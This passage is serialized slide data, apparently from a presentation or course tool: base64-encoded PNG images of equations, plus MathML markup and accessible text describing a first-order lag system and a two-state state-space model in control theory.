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wvbWZlbmNlZD48L21yb3c+PG1vPi48L21vPjwvbW92ZXI+PG1vPiYjeEEwOzwvbW8+PG1vPis8L21vPjxtbz4mI3hBMDs8L21vPjxtaT55PC9taT48bWZlbmNlZD48bWk+dDwvbWk+PC9tZmVuY2VkPjxtbz4mI3hBMDs8L21vPjxtbz49PC9tbz48bW8+JiN4MjAwOTs8L21vPjxtc3ViPjxtaT5BPC9taT48bW4+MDwvbW4+PC9tc3ViPjxtaT51PC9taT48bWZlbmNlZD48bWk+dDwvbWk+PC9tZmVuY2VkPjxtbz4mI3hBMDs8L21vPjxtbz4mI3gyMUQyOzwvbW8+PG1vPiYjeEEwOzwvbW8+PG1vdmVyPjxtcm93PjxtaT55PC9taT48bWZlbmNlZD48bWk+dDwvbWk+PC9tZmVuY2VkPjxtbz4mI3hBMDs8L21vPjxtbz49PC9tbz48bW8+JiN4MjAwOTs8L21vPjxtbz4tPC9tbz48bWZyYWM+PG1uPjE8L21uPjxtaT4mI3gzQzQ7PC9taT48L21mcmFjPjxtaT55PC9taT48bWZlbmNlZD48bWk+dDwvbWk+PC9tZmVuY2VkPjxtbz4rPC9tbz48bW8+JiN4QTA7PC9tbz48bWZyYWM+PG1zdWI+PG1pPkE8L21pPjxtbj4wPC9tbj48L21zdWI+PG1pPiYjeDNDNDs8L21pPjwvbWZyYWM+PC9tcm93Pjxtbz4mI3gyRDk7PC9tbz48L21vdmVyPjxtaT51PC9taT48bWZlbmNlZD48bWk+dDwvbWk+PC9tZmVuY2VkPjwvbXN0eWxlPjwvbWF0aD6LMNvNAAAAAElFTkSuQmCC\&quot;,\&quot;slideId\&quot;:308,\&quot;accessibleText\&quot;:\&quot;tau stack y open parentheses t close parentheses with. on top space plus space y open parentheses t close parentheses space equals thin space A subscript 0 u open parentheses t close parentheses space rightwards double arrow space stack y open parentheses t close parentheses space equals thin space minus 1 over tau y open parentheses t close parentheses plus space A subscript 0 over tau with dot on top u open parentheses t close parentheses\&quot;,\&quot;imageHeight\&quot;:25.487987987987985},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mover&gt;&lt;mrow&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mtable&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mo&gt;-&lt;/mo&gt;&lt;mfrac&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;/mfrac&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mo&gt;-&lt;/mo&gt;&lt;mfrac&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;/mfrac&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;/mfenced&gt;&lt;mtable&gt;&lt;mtr/&gt;&lt;mtr/&gt;&lt;/mtable&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mrow&gt;&lt;mo&gt;&amp;#x2D9;&lt;/mo&gt;&lt;/mover&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mtable&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mfrac&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/msub&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;/mfrac&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mfrac&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/msub&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;/mfrac&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;/mfenced&gt;&lt;mi&gt;u&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;,&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;y&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mtable&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;/mfenced&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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